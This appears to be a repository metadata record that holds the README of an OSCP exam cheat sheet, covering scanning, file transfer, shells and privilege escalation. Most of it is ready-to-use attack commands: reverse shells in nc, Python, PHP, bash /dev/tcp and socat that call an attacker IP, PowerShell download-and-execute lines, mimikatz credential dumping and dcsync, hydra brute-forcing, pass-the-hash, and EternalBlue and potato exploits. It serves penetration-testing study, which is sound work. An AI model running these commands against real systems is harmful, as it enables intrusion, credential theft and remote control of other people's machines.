{"id":16471131,"url":"https://github.com/rizemon/oscp-pwk-notes","last_synced_at":"2025-03-23T11:32:43.287Z","repository":{"id":50227084,"uuid":"326436743","full_name":"rizemon/OSCP-PWK-Notes","owner":"rizemon","description":"OSCP notes","archived":false,"fork":false,"pushed_at":"2021-05-01T09:34:18.000Z","size":833,"stargazers_count":51,"open_issues_count":0,"forks_count":22,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-18T20:05:17.544Z","etag":null,"topics":["oscp"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rizemon.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-03T15:20:22.000Z","updated_at":"2025-02-10T22:20:58.000Z","dependencies_parsed_at":"2022-09-24T09:01:17.315Z","dependency_job_id":null,"html_url":"https://github.com/rizemon/OSCP-PWK-Notes","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rizemon","download_url":"https://codeload.github.com/rizemon/OSCP-PWK-Notes/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245097158,"owners_
count":20560311,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["oscp"],"created_at":"2024-10-11T12:12:43.166Z","updated_at":"2025-03-23T11:32:42.801Z","avatar_url":"https://github.com/rizemon.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# OSCP-PWK-Notes\r\n\r\n## Exam Proofs\r\n\r\nLinux:\r\n\r\n```bash\r\nhostname\r\ncat /path/to/flag/proof.txt\r\nifconfig\r\n```\r\n\r\nWindows:\r\n\r\n```bash\r\nhostname\r\ntype C:\\path\\to\\flag\\proof.txt\r\nipconfig\r\n```\r\n\r\n\r\n## Useful services\r\n\r\n### SSHd\r\n\r\n```bash\r\nsudo systemctl start ssh\r\nsudo systemctl stop ssh\r\n```\r\n\r\nAdd this line to `/etc/ssh/ssh_config` or `/etc/ssh/sshd_config` if you are dealing with old versions of `ssh`. 
Running `ssh` with the `-v` option will help debug what key exchange algorithms you need.\r\n```\r\nKexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1\r\n```\r\n\r\n### Apache2\r\n\r\n```bash\r\n\r\nsudo systemctl start apache2\r\nsudo systemctl stop apache2\r\n```\r\n\r\nDefault root directory is `/var/www/html`.\r\n\r\n## Scanning\r\n\r\nUsing `rustscan`:  \r\n```bash\r\nrustscan --accessible -a \u003ctarget\u003e -r 1-65535 -- -sT -sV -sC -Pn\r\n```\r\n\r\nUsing `nmap`:  \r\n```bash\r\nnmap -Pn -sT -sV -sC \u003ctarget\u003e\r\n```\r\n\r\nRemember to perform a `UDP` scan and hopefully there is something you can use!\r\n\r\n```bash\r\nnmap -sU --script tftp-enum -p53,69,161 \u003ctarget\u003e\r\n```\r\n\r\nUsing `nmapAutomator`:\r\n```bash\r\n./nmapAutomator.sh 10.10.10.209 All\r\n```\r\n\r\n\r\n## File Transfers\r\n\r\n### HTTP\r\n\r\nTo start a `HTTP` server:\r\n```bash\r\nsudo python3 -m http.server 80\r\nsudo python2 -m SimpleHTTPServer 80\r\nsudo updog -p 80\r\n```\r\n\r\nTo download a file:\r\n```bash\r\nOn Linux\r\ncurl http://10.0.0.1:80/nc.exe \u003e nc.exe\r\nwget http://10.0.0.1:80/nc.exe -O nc.exe\r\n\r\nOn Windows:\r\ncertutil -f -split -urlcache http://10.0.0.1:80/nc.exe nc.exe\r\npowershell -c \"(New-Object System.Net.WebClient).DownloadFile('http://10.0.0.1:80/nc.exe', 'C:\\Users\\root\\Desktop\\nc.exe')\"\r\npowershell -c \"Invoke-WebRequest http://10.0.0.1:80/nc.exe -OutFile C:\\Users\\root\\Desktop\\nc.exe\"\r\n```\r\n\r\n### SMB\r\n\r\nTo start a `SMB` server:\r\n```bash\r\nOn Linux:\r\nsudo smbserver.py -port 445 -smb2support share . #SMB2\r\nsudo smbserver.py -port 445 share . 
#SMB1\r\n```\r\n\r\nTo download a file:\r\n\r\n```bash\r\nOn Windows:\r\ncopy \\\\10.0.0.1\\share\\nc.exe C:\\nc.exe\r\n\\\\10.0.0.1\\share\\whoami.exe\r\n```\r\n\r\n### FTP\r\n\r\nTo start a `FTP` server:\r\n```bash\r\nOn Linux:\r\nsudo python3 -m pyftpdlib -p 21 -w\r\n```\r\n\r\nTo download a file:\r\n```bash\r\nOn Windows:\r\nftp -A 10.0.0.1\r\nftp\u003e binary\r\nftp\u003e passive\r\n```\r\n\r\n### TFTP\r\n\r\nTo start a `TFTP` server:  \r\n```bash\r\nOn Linux:\r\nsudo atftpd --daemon --port 69 /tftp\r\n```\r\n\r\nTo download a file:  \r\n```bash\r\nOn Windows\r\ntftp -i 10.0.0.1 GET nc.exe\r\n```\r\n\r\n### nc\r\n\r\nLinux \u0026rarr; Windows\r\n```bash\r\nOn Linux:\r\ncat nc.exe | nc -lvnp 1337\r\n\r\nOn Windows\r\nnc 10.0.0.1 1337 \u003e nc.exe\r\n```\r\n\r\nWindows \u0026rarr; Linux\r\n```bash\r\nOn Linux:\r\nnc 10.0.0.1 1337 \u003c nc.exe\r\n\r\nOn Windows\r\nnc -lvnp 1337 \u003e nc.exe\r\n```\r\n\r\n## Reverse Shell\r\n\r\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\r\n\r\n### Listener\r\n```bash\r\nrlwrap nc -lvnp 1337\r\n```\r\n\r\n### Netcat/nc Traditional\r\n\r\n```bash\r\nnc -e /bin/sh 10.0.0.1 1337\r\nnc -e /bin/bash 10.0.0.1 1337\r\nnc -c /bin/bash 10.0.0.1 1337\r\n```\r\n\r\n### Netcat/nc OpenBSD\r\n\r\n```bash\r\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 10.0.0.1 1337 \u003e/tmp/f\r\n```\r\n\r\n### Python\r\n\r\nLinux:\r\n```bash\r\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. 
SOCK_STREAM);s.connect((\"10.0.0.1\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\r\n```\r\n\r\nWindows:\r\n```bash\r\nC:\\Python27\\python.exe -c \"(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 1337)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\\\windows\\\\system32\\\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) \u003e 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in 
[(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))\"\r\n```\r\n\r\n### PHP\r\n```bash\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);shell_exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);`/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263`;'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);system(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);passthru(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);popen(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\", \"r\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);$proc=proc_open(\"/bin/sh -i\", array(0=\u003e$sock, 1=\u003e$sock, 2=\u003e$sock),$pipes);'\r\n```\r\n\r\n### Bash TCP\r\n\r\n```bash\r\nbash -i \u003e\u0026 /dev/tcp/10.0.0.1/1337 0\u003e\u00261\r\n```\r\n\r\n### Powershell\r\n\r\n```bash\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.1 -Port 1337\r\n```\r\n\r\n## Powershell version\r\n\r\n```powershell\r\n64-bit: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n32-bit: C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe\r\nC:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe \r\n```\r\n\r\nTo check 32-bit/64-bit:\r\n```powershell\r\n[Environment]::Is64BitProcess\r\n```\r\n\r\n## Upgrade to Full TTY\r\n\r\nSome commands/exploits may only work when you 
have full TTY.\r\n\r\n### Socat\r\n\r\nAttacker:\r\n```bash\r\nsocat file:`tty`,raw,echo=0 TCP-L:1337\r\n```\r\n\r\nVictim:\r\n```bash\r\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1337\r\n```\r\n\r\n### From nc\r\n\r\nVictim:\r\n```bash\r\npython -c 'import pty;pty.spawn(\"/bin/bash\")'\r\nCtrl-z\r\n```\r\n\r\nAttacker:\r\n```bash\r\necho $TERM     # note down\r\nstty -a        # note down rows and cols\r\nstty raw -echo\r\nfg\r\n```\r\n\r\nVictim:\r\n```bash\r\nreset\r\nexport SHELL=bash\r\nexport TERM=xterm-256color # from \"echo $TERM\"\r\nstty rows 38 columns 116   # from \"stty -a\"\r\n```\r\n\r\n## Port Enumeration\r\n\r\n### Port 21 (FTP)\r\n\r\nLogin bruteforce:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e ftp\r\n```\r\n\r\n### Port 139/445 (SMB)\r\n\r\nChecking for vulnerabilities:\r\n```bash\r\nnmap -Pn -p445 --script smb-vuln-* \u003ctarget\u003e\r\nnmap -Pn -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version \u003ctarget\u003e # SambaCry\r\n```\r\n\r\nShare enumeration:\r\n```bash\r\nnmap -Pn -p445 --script smb-enum-shares.nse \u003ctarget\u003e    # May show path\r\n\r\nsmbmap -H \u003cIP\u003e [-P \u003cPORT\u003e]                              # Null user\r\nsmbmap -u \"username\" -p \"password\" -H \u003cIP\u003e [-P \u003cPORT\u003e]  # Creds\r\nsmbmap -u \"username\" -p \"\u003cLM\u003e:\u003cNT\u003e\" -H \u003cIP\u003e [-P \u003cPORT\u003e] # Pass-the-Hash\r\n\r\nenum4linux -a -u \"\u003cusername\u003e\" -p \"\u003cpassword\u003e\" \u003cIP\u003e\r\n```\r\n\r\nIf there is no null user, remember to try with the guest username.\r\n\r\nAccessing share:\r\n```bash\r\nsmbclient --no-pass -L //\u003cIP\u003e                              # Null user\r\nsmbclient -U 'username[%passwd]' -L [--pw-nt-hash] //\u003cIP\u003e  # If you omit the passwd, it will be prompted. 
With --pw-nt-hash, the passwd provided is the NT hash\r\n```\r\n\r\nIf there is SMB version incompatibility, edit `/etc/samba/smb.conf` and append `min protocol = SMB1` to the `[global]` section.\r\n\r\nLogin bruteforce:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e smb\r\n```\r\n\r\nGetting a shell:\r\n\r\nUsing `psexec.py`:\r\n```bash\r\npsexec.py -hashes \"\u003cLM\u003e:\u003cNT\u003e\" Administrator@10.0.0.1\r\npsexec.py Administrator:\u003cpassword\u003e@10.0.0.1\r\npsexec.py \u003cdomain\u003e/Administrator:\u003cpassword\u003e@10.0.0.1\r\n```\r\n\r\nUsing `winexe`:\r\n```bash\r\nwinexe -U Administrator%\u003cpassword\u003e //10.0.0.1 cmd.exe\r\n```\r\n\r\nUsing `pth-winexe`:\r\n```bash\r\npth-winexe -U Administrator%\u003cLM\u003e:\u003cNT\u003e //10.0.0.1 cmd.exe\r\n```\r\n\r\n`aad3b435b51404eeaad3b435b51404ee` is the blank LM hash.\r\n\r\n### Port 389 (LDAP)\r\n\r\nGetting LDAP information:\r\n\r\n```bash\r\nldapsearch -h \u003ctarget\u003e -p 389 -x -b \"dc=htb,dc=local\"\r\npython windapsearch.py -d htb.local -U --dc-ip \u003ctarget\u003e\r\n```\r\n\r\n### Port 80 (HTTP) / 443 (HTTPS)\r\n\r\nWeb server scanning:\r\n```bash\r\nnikto -host http://target:80\r\n```\r\n\r\nDirectory brute-forcing:\r\n\r\nIf there is a `/cgi-bin/` folder, try: `.cgi,.pl,.py`\r\n\r\n```bash\r\ngobuster dir -k -u \"http://target:80/\" -w /usr/share/wordlists/dirb/common.txt -t 100 -x .html,.txt,.xml,.jsp,.php,.asp\r\n\r\nWordlists:\r\n1) /usr/share/wordlists/dirb/big.txt\r\n2) /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt\r\n```\r\n\r\nWordlist creation:\r\n```bash\r\ncewl -e -a http://target:80/ -w wordlist.txt\r\n```\r\n\r\nForm bruteforce:\r\n\r\nUsing `hydra`:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e http-post-form \"/otrs/index.pl:Action=Login\u0026RequestedURL=\u0026Lang=en\u0026TimeOffset=300\u0026User=^USER^\u0026Password=^PASS^:Login Failed\"\r\n```\r\n\r\nUsing 
`ffuf`:\r\n```bash\r\nffuf  -w /usr/share/wordlists/rockyou.txt -u http://nineveh.htb/department/login.php -X POST -d \"username=admin\u0026password=FUZZ\" -fr \"Invalid Password\" -H \"Content-Type: application/x-www-form-urlencoded\" -t 100        \r\n```\r\n\r\nTesting for shellshock:\r\n\r\n```bash\r\nnmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls \u003ctarget\u003e\r\n```\r\n\r\nTesting for heartbleed:\r\n\r\n```bash\r\nnmap -p 443 --script ssl-heartbleed \u003ctarget\u003e\r\n```\r\n\r\n### Port 3306 (MySQL)\r\n\r\nLogin bruteforce:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e mysql\r\n```\r\n\r\nAccessing:\r\n```bash\r\nmysql -h \u003ctarget\u003e -uroot -ptoor\r\n```\r\n\r\n### Port 5985 (WinRM)\r\n\r\nGetting a shell:\r\n```bash\r\nevil-winrm -i \u003ctarget\u003e -u \u003cusername\u003e -p \u003cpassword\u003e\r\nevil-winrm -i \u003ctarget\u003e -u \u003cusername\u003e -H \u003cNT hash\u003e\r\n```\r\n\r\nLogin bruteforce:\r\n```bash \r\ngit clone https://github.com/mchoji/winrm-brute\r\ncd winrm-brute\r\nbundle config path vendor/bundle\r\nbundle install\r\nbundle exec ./winrm-brute.rb -U users.txt -P passwords.txt 10.0.0.1\r\n```\r\n\r\n### Port 1433 (MSSQL)\r\n\r\nAccessing:\r\n```bash\r\nsqsh -S \u003ctarget\u003e:1433 -U sa\r\n```\r\n\r\n## Privilege Escalation\r\n\r\n### [Windows](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)\r\n\r\n#### [winPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)\r\n\r\n```bash\r\nwinPEASany.exe\r\nwinPEAS.bat\r\n```\r\n\r\n#### [Seatbelt](https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Seatbelt.exe)\r\n\r\n```bash\r\nSeatbelt.exe -group=system\r\nSeatbelt.exe -group=user\r\nSeatbelt.exe -group=misc\r\nSeatbelt.exe -group=all 
-full\r\n```\r\n\r\n#### [Sherlock](https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1)\r\n\r\n```bash\r\nImport-Module .\\Sherlock.ps1; Find-AllVulns\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Sherlock.ps1'); Find-AllVulns\r\n```\r\n\r\n#### [Powerless](https://github.com/M4ximuss/Powerless/blob/master/Powerless.bat)\r\n\r\n```bash\r\nPowerless.bat\r\n```\r\n\r\n#### [Mimikatz](https://github.com/gentilkiwi/mimikatz)\r\n\r\n```bash\r\nmimikatz.exe\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::sam exit\"\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::secrets exit\"\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::cache exit\"\r\nmimikatz.exe \"privilege::debug token::elevate sekurlsa::logonpasswords exit\"\r\nmimikatz.exe \"privilege::debug token::elevate vault::cred /patch exit\"\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::dcsync /user:domain\\krbtgt /domain:lab.local exit\"\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\r\n```\r\n\r\n#### [Kerberoast](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1)\r\n\r\n```bash\r\nImport-Module .\\Invoke-Kerberoast.ps1; Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat\r\n```\r\n\r\n#### [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)\r\n\r\n```bash\r\nwindows-exploit-suggester.py --update\r\nsysteminfo \u003e systeminfo.txt\r\nwindows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt \r\n```\r\n\r\n#### [Windows Exploit Suggester NG](https://github.com/bitsadmin/wesng)\r\n\r\n```bash\r\nwes.py --update\r\nsysteminfo 
\u003e systeminfo.txt\r\nwes.py systeminfo.txt\r\n```\r\n\r\n### [Linux](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)\r\n\r\n#### [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)\r\n\r\n```bash\r\n./lse.sh -l 1 -i\r\n```\r\n\r\n#### [LinEnum.sh](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh)\r\n\r\n```bash\r\n./LinEnum.sh\r\n```\r\n\r\n#### [LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh)\r\n\r\n```bash\r\n./linpeas.sh\r\n```\r\n\r\n#### [SUDO_Killer](https://github.com/TH3xACE/SUDO_KILLER)\r\n\r\n```bash\r\n./extract.sh\r\n./sudo_killer.sh -c -i /path/sk_offline.txt\r\n```\r\n\r\n#### [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh)\r\n\r\n```bash\r\n./linux-exploit-suggester.sh -k 3.2.0\r\n```\r\n\r\n#### [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl)\r\n\r\n```bash\r\n./linux-exploit-suggester-2.pl -k 3.2.0\r\n```\r\n\r\n## Port-Forwarding\r\n\r\n### Local SSH Forwarding\r\n\r\nIf a service is only exposed on a host in another network and you want to make it accessible on a local port,\r\n\r\n```bash\r\nssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER\r\n```\r\n\r\n### Remote SSH Forwarding\r\n\r\nIf a service is only reachable from your local host and you want to make it accessible on a port of the SSH server (the reverse of local forwarding),\r\n\r\nUsing `ssh`:\r\n```bash\r\nssh -R 3306:127.0.0.1:3306 user@SSH_SERVER\r\n```\r\n\r\nUsing `plink.exe`:\r\n```bash\r\nplink.exe -l root -pw root 10.10.XX.XX -R 445:127.0.0.1:445 -P 2222\r\n```\r\n\r\n## Compiling Exploits\r\n\r\n```bash\r\ngcc -pthread dirty.c -o dirty -lcrypt                 # Dirty Cow\r\ni686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32 # 'afs.sys'\r\ngcc -m32 
-Wl,--hash-style=both 9542.c -o 9542         # 'ip_append_data()\r\n```\r\n\r\n## Useful tools\r\n\r\n### `JuicyPotato`:\r\n\r\nRequires `SeAssignPrimaryTokenPrivilege` and `SeImpersonatePrivilege`\r\n\r\n```bash\r\njuicypotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"/c C:\\reverse.exe\" -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}\r\n```\r\n\r\nGet `CLSID` from [here](https://ohpe.it/juicy-potato/CLSID/)\r\n\r\n### `RoguePotato`:\r\n\r\nRequires `SeAssignPrimaryTokenPrivilege` and `SeImpersonatePrivilege`\r\n\r\nFor Windows Server 2019 and Windows 10.\r\n\r\nSet up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:\r\n```bash\r\n$ sudo socat tcp-listen:135,reuseaddr,fork tcp:\u003ctarget\u003e:9999\r\n```\r\n\r\nRun the `RoguePotato` exploit:\r\n\r\n```bash\r\nRoguePotato.exe -r \u003cattacker\u003e -e \"C:\\PrivEsc\\reverse.exe\" -l 9999\r\n```\r\n\r\n### `PrintSpoofer`:\r\n\r\nRequires `SeImpersonatePrivilege`\r\n\r\nWindows 8.1, Windows Server 2012 R2, Windows 10 and Windows Server 2019\r\n\r\n```bash\r\nPrintSpoofer.exe -c \"C:\\PrivEsc\\reverse.exe\" -i\r\n```\r\n\r\n### `EternalBlue`:\r\n\r\n```bash\r\npython eternalblue/checker.py legacy.htb\r\npython eternalblue/send_and_execute.py legacy.htb reverse.exe 445 \u003cpipe\u003e\r\n```\r\n\r\n### `MSFVenom`:\r\n\r\n\r\n## Static Binaries\r\n\r\nhttps://github.com/ernw/static-toolbox\r\n\r\nhttps://github.com/ZephrFish/static-tools\r\n\r\nhttps://github.com/andrew-d/static-binaries\r\n\r\nhttps://github.com/interference-security/kali-windows-binaries\r\n\r\nhttps://github.com/r3motecontrol/Ghostpack-CompiledBinaries\r\n\r\n## Compiled Exploits\r\n\r\nhttps://github.com/SecWiki/windows-kernel-exploits\r\n\r\nhttps://github.com/SecWiki/linux-kernel-exploits\r\n\r\nhttps://github.com/abatchy17/WindowsExploits\r\n\r\n## Useful Exploits\r\n\r\n[Windows XP SP0/SP1 Privilege Escalation to System](https://sohvaxus.github.io/content/winxp-sp1-privesc.html)\r\n\r\n[Bypassing 
default UAC settings manually](https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/)\r\n\r\n[MS17-010/Eternal Blue](https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py)\r\n\r\n[Ghostcat](https://github.com/dacade/CVE-2020-1938)\r\n\r\n[SMTP Shellshock](https://gist.github.com/claudijd/33771b6c17bc2e4bc59c)\r\n\r\n[SambaCry](https://github.com/joxeankoret/CVE-2017-7494)\r\n\r\n[Samba Symlink Traversal](https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually)\r\n\r\n## References\r\n\r\nhttps://github.com/tbowman01/OSCP-PWK-Notes-Public\r\n\r\nhttps://github.com/swisskyrepo/PayloadsAllTheThings\r\n\r\nhttps://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic\r\n\r\nhttps://book.hacktricks.xyz/\r\n\r\nhttps://github.com/frizb/Hydra-Cheatsheet\r\n\r\n## Tools list (`install.sh`)\r\n\r\n### General\r\n\r\n| Toolname          | Location                       | Installed  |\r\n| ----------------- | ------------------------------ | ---------- |\r\n| `docker-ce`       | -                              | Yes        |\r\n| `rlwrap`          | -                              | Yes        |\r\n| `code`            | -                              | Yes        |\r\n| `openjdk-11-jdk`  | -                              | Yes        |\r\n| `gdb`             | -                              | Yes        |\r\n| `pip2`            | -                              | Yes        |\r\n| `pip3`            | -                              | Yes        |\r\n| `updog`           | -                              | Yes        |\r\n| `volatility`      | `~/Desktop/tools/volatility3`  | Yes        |\r\n| `ghidra`          | `~/Desktop/tools/ghidra`       | Yes        |\r\n| `sysinternals`    | `~/Desktop/tools/sysinternals` | Yes        |\r\n| `pwntools`        | -                              | Yes        |\r\n| `z3-solver`       | -                              | Yes        
|\r\n| `randcrack`       | -                              | Yes        |\r\n\r\n### Shell\r\n\r\n| Toolname          | Location                    | Installed  |\r\n| ----------------  | --------------------------- | ---------- |\r\n| `rlwrap`          | -                           | Yes        |\r\n| `telnet`          | -                           | Yes        |\r\n| `evil-winrm`      | -                           | Yes        |\r\n| `msfpc`           | `~/Desktop/tools/msfpc`     | Yes        |\r\n| `rsg`             | `~/Desktop/tools/rsg`       | Yes        |\r\n\r\n\r\n### Web\r\n\r\n| Toolname          | Location                   | Installed  |\r\n| ----------------  | -------------------------- | ---------- |\r\n| `gobuster`        | -                          | Yes        |\r\n| `ffuf`            | -                          | Yes        |\r\n| `seclists`        | `~/Desktop/tools/seclists` | Yes        |\r\n| `mariadb-client`  | -                          | Yes        |\r\n| `feroxbuster`     | -                          | Yes        |\r\n\r\n### Compilation \r\n\r\n| Toolname          | Location                   | Installed  |\r\n| ----------------  | -------------------------- | ---------- |\r\n| `cmake`           | -                          | Yes        |\r\n| `mingw-w64`       | -                          | Yes        |\r\n\r\n\r\n### Brute-force\r\n\r\n| Toolname          | Location                   | Installed  |\r\n| ----------------- | -------------------------- | ---------- |\r\n| `crowbar`         | -                          | Yes        |\r\n\r\n\r\n### Recon\r\n\r\n| Toolname          | Location                   | Installed  |\r\n| ----------------- | -------------------------- | ---------- |\r\n| `rustscan`        | -                          | Yes        |\r\n| `AutoRecon`       | -                          | Yes        |\r\n| `nmapAutomator`   | -                          | Yes        |\r\n\r\n### Windows Enumeration\r\n\r\n| Toolname  
                  | Location                                    | Installed  |\r\n| -----------------           | ------------------------------------------- | ---------- |\r\n| `Sherlock`                  | `~/Desktop/web/sherlock.ps1`                | Yes        |\r\n| `Empire`                    | `~/Desktop/tools/Empire`                    | Yes        |\r\n| `wesng`                     | `~/Desktop/tools/wesng`                     | Yes        |\r\n| `Windows-Exploit-Suggester` | `~/Desktop/tools/Windows-Exploit-Suggester` | Yes        |\r\n| `Powerless`                 | `~/Desktop/web/powerless.bat`               | Yes        |\r\n| `Seatbelt`                  | `~/Desktop/web/seatbelt.exe`                | Yes        |\r\n| `Powerview`                 | `~/Desktop/web/powerview.ps1`               | Yes        |\r\n| `winPEAS`                   | `~/Desktop/web/winpeasany.exe`              | Yes        |\r\n| `nishang`                   | `~/Desktop/tools/nishang`                   | Yes        |\r\n| `juicypotato x64`           | `~/Desktop/web/juicypotato.exe`             | Yes      